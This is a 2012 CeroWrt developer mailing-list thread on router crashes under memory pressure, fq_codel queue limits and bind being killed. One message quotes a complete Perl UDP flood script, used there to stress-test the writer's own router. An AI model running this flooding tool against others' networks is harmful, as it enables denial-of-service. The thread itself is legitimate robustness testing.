Hi Dave, sorry for accidentally taking this private, so here it is again.
On Aug 20, 2012, at 12:41 PM, Sebastian Moeller wrote: > Hi Dave, > > thanks for the long and thoughtful response. > > > On Aug 20, 2012, at 12:12 PM, Dave Taht wrote: > >> Dear Sebastian: >> >> In addition to your udp flooding DoS attack, I attacked cero also by >> using diffserv marking in netperf (-Y codepoint,codepoint) to saturate >> all 4 wifi fq_codel queues, and also would get the router to have >> memory allocation failures and ultimately crash in the same way you >> are crashing it. I can similarly do what you just did with rtp >> flooding. You are correct that codel is tuned for tcp, and that >> fq_codel by maintaining many queues is even more susceptible to a >> tuned udp flooding attack on a memory limited device such as this. > > Ah, I did not think that I reported something new in regards to crash > the router, it was more about me having found a way to reproduce it without > netsurf/iperf (which I never really got to run, due to a lack of endpoints) > as well as without using http://broadband.mpi-sws.org/residential/ (as this > only allows around 5 runs per 24hour period). > >> >> I tried to cope with this in 3.3.8-10/11 by reducing the packet >> limits, which helped a lot. Unfortunately the settings I used then >> were below codel's reaction time, which invoked "interesting" tail >> drop behavior, so I arbitrarily doubled them in -17. To invoke more of >> the kind of problems you are encountering… > > That would be limit 600? Is 600 a problem for a single flow, or die to > limit being for the sum of all flows? Would an additional per flow limit be > able to help deal with this issue? > >> >> 0) Since then I have been looking into ways to improve codel's >> reaction time that are in the ns2 model presently, also fixing an >> assumption about newton's method that didn't hold in reverse, and also >> means to incorporate more aggressive codel behavior when queue limits >> are near to being exceeded. > > I see ramping up the drop frequency once space gets tight... > >> >> Unfortunately as the memory pressure problem starts in the driver, >> it's not communicated up the stack to where it could be controlled >> better… > > Argh, sounds like fun :) > >> >> 0) I would like avoid having to determining if a queue is tcp or >> "other", and then having different kinds of drop strategies for each. >> That said, it seems possible to implement that… > > Since the flows are filled by hash, a flow might contain both, correct? > So being more firm in non-tcp containg flows, might hurt some TCP in shared > bins. > >> >> 1) A workaround of sorts for the 64MB 3700v2 has been to give up on >> named and get some memory back that way. > > Since I am a layman, what is the quick and dirty (and reversible) way > to do so, so I can test this? > >> >> 2) I believe, but am not sure, that Linux 3.6(5?) has some stuff in it >> to get skb memory allocations done more efficiently. Eric and I and >> felix had talked about it, I don't know what was implemented. > > ISTR there was something about fixing the accounting of drivers so they > track all buffers and not just part of the payload (truesize was the word). > Which totally went over my head, but sounds like something that might help... > >> >> 3) It may be possible to improve how the memory allocations from the >> 2048 slab work in general. I imagine that half of memory is being >> wasted on big packets otherwise. > > I had a quick look at the SLUB documentation and see no way to do so I > can understand. > >> >> 4) some options for improving fq_codel for more memory constrained >> home environments better. >> >> 4a) On the wifi front (as well as other devices with multiple hardware >> queues), I envision something like "mfq_codel", which would have an >> overall similar packet limit to a single fq_codel, but be able to >> deliver (and fair queue) packets to the underlying hardware queues >> independently. > > Sounds like something to test I guess (but out of my league) > >> >> 4b) On the home to-ISP gateway qos front, a rate limited (tbf) >> mfq_codel with 2-4 queues would replace the complexity of hfsc or htb >> with a default qdisc that "just worked" without any scripting. It >> could be mildly more responsive (htb buffers up some data and has it's >> own notion of time and quantums), thus cpu and memory usage would be >> lower than htb + multiple fq_codel queues. > > But I thought that being able to arbitrarily prioritize some traffic in > a home router is a good thing; and that will require some hierarchical system > and will bring along some complexity... > > >> >> Getting something that scaled down to 10s of kbits and up to gigabits >> would be hard, tho. HTB needs to be tuned when running lower or higher >> than it's original operating range, presently, and that is where, in >> part, the simple_qos.sh effort is "stuck". > > Can't this not be divined from the configured up and downlink rates? Or > are you thinking about dynamic changes in link-rates? > >> >> 4c) Another thought would be to have a weighted packet (to handle >> classification) oriented sfq codel or qfq_codel rather than separate >> fq_codel queues that are each byte-aware... we have CPU to burn, but >> not memory… > > That I admit I do not understand. > > Thanks a lot & best regards > Sebastian > >> >> On Mon, Aug 20, 2012 at 11:24 AM, Sebastian Moeller <moell...@gmx.de> wrote: >>> Hi Dave, >>> >>> so I went to play around with this a bit more. I turned to UDP flooding my >>> cable modem through the router and this surely allows me to create enough >>> load on the wndr3700v2 to cause the allocation errors and as a "bonus" also >>> to drive the router to reboot (driven by the watchdog timer?). Here is the >>> script I used over 5G wireless (from >>> http://blog.ioshints.info/2008/03/udp-flood-in-perl.html) >>> >>> #!/usr/bin/perl >> >> It would be nice to have a C or lua version of this sort of test. >> >>> ############## >>> >>> # udp flood. >>> ############## >>> >>> use Socket; >>> use strict; >>> >>> if ($#ARGV != 3) { >>> print "flood.pl <ip> <port> <size> <time>\n\n"; >>> print " port=0: use random ports\n"; >>> print " size=0: use random size between 64 and 1024\n"; >>> print " time=0: continuous flood\n"; >>> exit(1); >>> } >>> >>> my ($ip,$port,$size,$time) = @ARGV; >>> >>> my ($iaddr,$endtime,$psize,$pport); >>> >>> $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n"; >>> $endtime = time() + ($time ? $time : 1000000); >>> >>> socket(flood, PF_INET, SOCK_DGRAM, 17); >>> >>> >>> print "Flooding $ip " . ($port ? $port : "random") . " port with " . >>> ($size ? "$size-byte" : "random size") . " packets" . >>> ($time ? " for $time seconds" : "") . "\n"; >>> print "Break with Ctrl-C\n" unless $time; >>> >>> for (;time() <= $endtime;) { >>> $psize = $size ? $size : int(rand(1024-64)+64) ; >>> $pport = $port ? $port : int(rand(65500))+1; >>> >>> send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));} >>> >>> called as either >>> udp_flood.pl 192.168.100.1 0 1024 240 >>> or >>> udp_flood.pl 192.168.100.1 32000 1024 240 >>> >>> The first version with randomized port number spreads the load nicely over >>> many fq_codel bins/flows and seems slightly more likely to cause allocation >>> errors and reboots than the 2nd invocation which restricts itself to port >>> 32000 and presumably just one flow. >>> I wonder how to make cerowrt survive this kind of stress test… >>> >>> best >>> Sebastian >>> >>> >>> On Aug 15, 2012, at 9:08 PM, Dave Taht wrote: >>> >>>> re: ath: skbuff alloc of size 1926 failed >>>> >>>> as for the ath skbuff problem, I've seen that a lot. I had put hard >>>> packet limits (~600) on fq_codel in -11 and prior that were too low >>>> and it mostly went away, but I hit tail drop behavior everywhere, >>>> instead of codel behavior. What I have now (typically 1200) may well >>>> be too high, but not as overly high as the default (10k packets). >>>> There may be another means of increasing the size of that slab pool or >>>> making it less onerous. >>>> >>>> I would like it if codel "kicked in" earlier than it currently does. >>>> The code in ns2 is currently using half the period that the linux code >>>> is. This would control things better, or so I hope (planning on trying >>>> this as I get time) >>>> >>>> I am also considering means of artificially upscaling the drop >>>> scheduler when we get close to queue limits. >>>> >>>> See some discussions on the codel list for these issues. (sims are >>>> easier to deal with than cerowrt, too!) >>>> >>>> as for bind, it should be automagically restarted from xinetd, no need >>>> to fiddle with anything. However, since you are already under massive >>>> memory pressure, it may well fail to start up that way, too. At the >>>> moment, I've largely given up on bind on anything but a more core home >>>> gw, and am running dnsmasq on everything (3700v2, picostations, >>>> nanostations) but the 3800s. (and the ones I run it on, aren't being >>>> used for wifi right now). >>>> >>>> Lastly: Swap space won't help you on exhausting kernel limits. >>>> >>>> I'm glad you can reproduce the ath: slab problem - I can get it too at >>>> high rates using netperf over wifi. I will try a 3700v2 with and >>>> without bind to see if it's still there in 3.3.8-17. In the meantime >>>> if anyone knows how to get more allocations in that (2048? 4096?) slab >>>> by default, perhaps that will help? >>>> >>>> >>>> >>>> On Wed, Aug 15, 2012 at 10:23 AM, Sebastian Moeller <moell...@gmx.de> >>>> wrote: >>>>> Hi Dave, >>>>> >>>>> great work, as always I upgraded my production router to the latest and >>>>> greatest (since I only have one router…). And it works quite well for >>>>> normal usage… >>>>> Netalyzr reports around 2800ms seconds of uplink buffering, yet >>>>> saturating the uplink does not affect ping times to a remote target >>>>> noticeably, basically the same as for all codellized ceo versions I >>>>> tested so far... >>>>> >>>>> Some notes and a question: >>>>> I noticed that even given plenty of swap space (1GB on a usb stick), >>>>> using http://broadband.mpi-sws.org/residential/ to exercise UDP stress >>>>> (on the uplink I assume) I can easily produce (I run the test from a >>>>> macosx via 5GHz wireless over 1.5 yards): >>>>> Aug 15 01:16:29 nacktmulle kern.err kernel: [175395.132812] ath: skbuff >>>>> alloc of size 1926 failed >>>>> (and plenty of those…). >>>>> What then happens is that the OOM killer will aim for bind (reasonable >>>>> since it is the largest single process) and kill it. When I try to >>>>> restart bind by: >>>>> root@nacktmulle:~# /etc/rc.d/S47namedprep start >>>>> root@nacktmulle:~# /etc/rc.d/S48named restart >>>>> Stopping isc-bind >>>>> /etc/chroot/named//var/run/named/named.pid not found, trying brute force >>>>> killall: named: no process killed >>>>> Kicking isc-bind in xinetd >>>>> rndc: connect failed: 127.0.0.1#953: connection refused >>>>> And bind does not start again and the router becomes less than useful. >>>>> Now I assume I am doing something wrong, but what, if you have any idea >>>>> how to solve this short of a reboot of the router (my current method) I >>>>> would be happy to learn >>>>> >>>>> >>>>> >>>>> best regards >>>>> sebastian >>>>> >>>>> On Aug 12, 2012, at 11:08 PM, Dave Taht wrote: >>>>> >>>>>> I'm too tired to write up a full set of release notes, but I've been >>>>>> testing it all day, >>>>>> and it looks better than -10 and certainly better than -11, but I won't >>>>>> know >>>>>> until some more folk sit down and test it, so here it is. >>>>>> >>>>>> http://huchra.bufferbloat.net/~cero1/3.3/3.3.8-17/ >>>>>> >>>>>> fresh merge with openwrt, fix to a bind CVE, fixes for 6in4 and quagga >>>>>> routing problems, >>>>>> and a few tweaks to fq_codel setup that might make voip better. >>>>>> >>>>>> Go forth and break things! >>>>>> >>>>>> In other news: >>>>>> >>>>>> Van Jacobson gave a great talk about bufferbloat, BQL, codel, and >>>>>> fq_codel >>>>>> at last week's ietf meeting. Well worth watching. At the end he outlines >>>>>> the deployment problems in particular. >>>>>> >>>>>> http://recordings.conf.meetecho.com/Recordings/watch.jsp?recording=IETF84_TSVAREA&chapter=part_3 >>>>>> >>>>>> Far more interesting than this email! >>>>>> >>>>>> >>>>>> -- >>>>>> Dave Täht >>>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out >>>>>> with fq_codel!" >>>>>> _______________________________________________ >>>>>> Cerowrt-devel mailing list >>>>>> Cerowrt-devel@lists.bufferbloat.net >>>>>> https://lists.bufferbloat.net/listinfo/cerowrt-devel >>>>> >>>> >>>> >>>> >>>> -- >>>> Dave Täht >>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out >>>> with fq_codel!" >>> >> >> >> >> -- >> Dave Täht >> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out >> with fq_codel!" > _______________________________________________ Cerowrt-devel mailing list Cerowrt-devel@lists.bufferbloat.net https://lists.bufferbloat.net/listinfo/cerowrt-devel